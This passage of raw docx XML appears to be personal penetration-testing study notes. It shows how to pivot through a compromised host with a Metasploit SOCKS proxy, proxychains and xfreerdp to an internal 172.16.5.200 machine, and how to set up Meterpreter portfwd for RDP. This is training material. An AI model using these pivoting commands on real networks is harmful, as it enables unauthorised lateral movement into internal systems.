        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run -j</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B90">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the -j flag means "run the module as a background job."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B91">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B92">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can now update our proxychains configuration file (/etc/proxychains4.conf) to take advantage of the SOCKS5 proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B93">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B94">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After editing the configuration file, it should appear as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B95">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B96">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2286000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="145" name="image131.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image131.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId242"/>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B97">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="863"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tail /etc/proxychains4.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="863"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socks5 127.0.0.1 1080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B99">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B9A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xfreerdp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to obtain GUI access from our Kali Linux system to the target machine on the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B9B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B9C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3797300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="355" name="image349.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image349.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId243"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="594360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B9D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1185"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo proxychains xfreerdp /v:172.16.5.200 /u:luiza</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B9E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1185"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.5.200 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the target machine we want to interact with on the 172 network</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B9F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BA0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By prepending the command with proxychains, this sends the command to the SOCKS proxy on 127.0.0.1 on port 1080, which gets sent to the compromised machine on 172 subnet, where the command is finally run, so we can access the IP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.5.200</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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t xml:space="preserve">We successfully used the compromised machine on 172 subnet as our pivot into accessing any machine on the 172 subnet!!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BA3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3rk2xflvtaos" w:id="99"/>
      <w:bookmarkEnd w:id="99"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port forwarding inside of metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BA6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BA7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In case you are curious, here is how to port forward on Metasploit. This DOES NOT interact with the SOCKS proxy used earlier. But, it does require you to add the route to Metasploit's Route Table, so make sure to do that either using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route add</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">multi/manage/autoroute</w:t>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t xml:space="preserve">This is an alternative to using SOCKS, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in case you are using a tool that is not SOCKS friendly</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and you just need </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">one port</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to attack, not multiple.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BAA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BAB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Firstly, go back to the meterpreter session where your compromised machine is, and then run portfwd </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BAC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3187700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="566" name="image545.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image545.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId244"/>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BAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions -i 12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The compromised machine is on meterpreter session 12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BAF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">portfwd -h</w:t>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t xml:space="preserve">We can create a port forward from localhost port 3389 (PORT FOR </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RDP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) to port 3389 on the target host (172.16.5.200) as shown in Listing 85.</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4881563" cy="805771"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="544" name="image554.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image554.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId245"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4881563" cy="805771"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="478"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.5.200</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the target machine that we want to interact with on 172 subnet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BB5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="478"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3389 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is used for RDP, which is the port we want to connect to on target machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="478"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-l 3389</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Local</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">port (on Kali) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to listen on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BB7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="478"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p 3389</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Remote port to</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> connect to on 172.16.5.200</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="478"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we didn't specify which ports can access our listener:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="478"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">it implicitly listens on 0.0.0.0:3389, meaning:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="478"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Any program on your Kali box connecting to 127.0.0.1:3389 will work</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BBB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="478"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It would also accept connections to &lt;your-Kali-IP&gt;:3389 from outside (if a firewall doesn’t block it)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BBC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="478"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can specify using</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -L 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000BBD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
